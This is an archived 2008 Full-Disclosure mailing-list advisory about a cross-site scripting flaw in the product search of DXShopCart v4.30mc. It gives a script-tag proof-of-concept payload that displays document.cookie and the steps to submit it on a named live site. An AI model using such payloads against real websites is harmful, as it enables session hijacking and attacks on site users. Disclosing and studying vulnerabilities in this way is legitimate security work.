full-disclosure-uk August 2008 archive
Main Archive Page > Month Archives  > full-disclosure-uk archives
full-disclosure-uk: [Full-disclosure] DXShopCart v4.30mc product

[Full-disclosure] DXShopCart v4.30mc product search.php xss

From: bug squash <bugsquashr_at_nospam>
Date: Thu Aug 21 2008 - 17:24:19 GMT
To: full-disclosure@lists.grok.org.uk


###################################

DXShopCart V4.30mc search.php XSS
###################################

Author: d00m3d! Chik3n hUnT3r 666
email: bugsquashr@gmail.com

Example:
<script>alert(document.cookie)</script>

in the product search on http://www.scripts4profit.net/ShopCartDX/index.php

click submit

###################################



Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/